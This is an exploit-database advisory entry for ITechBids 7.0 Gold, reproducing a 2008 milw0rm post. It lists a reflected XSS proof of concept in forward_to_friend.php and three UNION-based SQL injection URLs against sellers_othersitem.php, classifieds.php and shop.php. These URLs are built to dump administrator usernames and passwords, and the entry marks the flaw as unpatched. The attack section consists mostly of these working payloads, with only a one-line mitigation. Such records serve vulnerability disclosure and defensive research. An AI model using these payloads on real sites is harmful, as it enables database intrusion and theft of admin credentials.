ITechBids 7.0 Gold Multiple Remote Vulnerabilities

vendor:

ITechBids

by:

Encrypt3d.M!nd

7.5

CVSS

HIGH

Cross-site scripting (XSS) and Remote Sql Injection(s)

79 (XSS) and 89 (SQL Injection)

CWE

Product Name: ITechBids

Affected Version From: 7

Affected Version To: 7

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

ITechBids 7.0 Gold Multiple Remote Vulnerabilities

A Cross-site scripting (XSS) vulnerability exists in the forward_to_friend.php file, which can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Remote Sql Injection(s) vulnerabilities exist in the sellers_othersitem.php, classifieds.php and shop.php files, which can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Mitigation:

Input validation should be used to prevent Cross-site scripting (XSS) and Remote Sql Injection(s) attacks. Sanitize all user input data and escape special characters.

Source

Exploit-DB raw data:

######## ##    ##  ######  ########  ##    ## ########  ########  #######  ######## 
##       ###   ## ##    ## ##     ##  ##  ##  ##     ##    ##    ##     ## ##     ##
##       ####  ## ##       ##     ##   ####   ##     ##    ##           ## ##     ##
######   ## ## ## ##       ########     ##    ########     ##     #######  ##     ##
##       ##  #### ##       ##   ##      ##    ##           ##           ## ##     ##
##       ##   ### ##    ## ##    ##     ##    ##           ##    ##     ## ##     ##
######## ##    ##  ######  ##     ##    ##    ##           ##     #######  ######## 

################################ !R4Q!4N H4CK3R  ###################################

ITechBids 7.0 Gold Multiple Remote Vulnerabilities

Website : http://www.itechscripts.com

Founded By : Encrypt3d.M!nd

NOTE:I Didn't Search The Script Well,So Maybe There is other Vulnerabilities.


# 1- Cross-site scripting (XSS):

Affected File : forward_to_friend.php

PoC :

/forward_to_friend.php?productid=<script>alert(666);</script>


# 2-Remote Sql Injection(s) :

Affected File(s) :

sellers_othersitem.php
classifieds.php
shop.php

Note:There is Other Files Affected But I Couldn't Exploit Them :(

PoC:

/sellers_othersitem.php?seller_id=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin

/classifieds.php?productid=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin

/shop.php?id=666666+union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+admin


# Greetz:

MY Sweet,L!0N,EL Mariachi,-=MizO=-(:-L),Shadow Administrator,
KoRn The Dog,Mini-Spider,All My Friends


The EnD :D

# milw0rm.com [2008-07-13]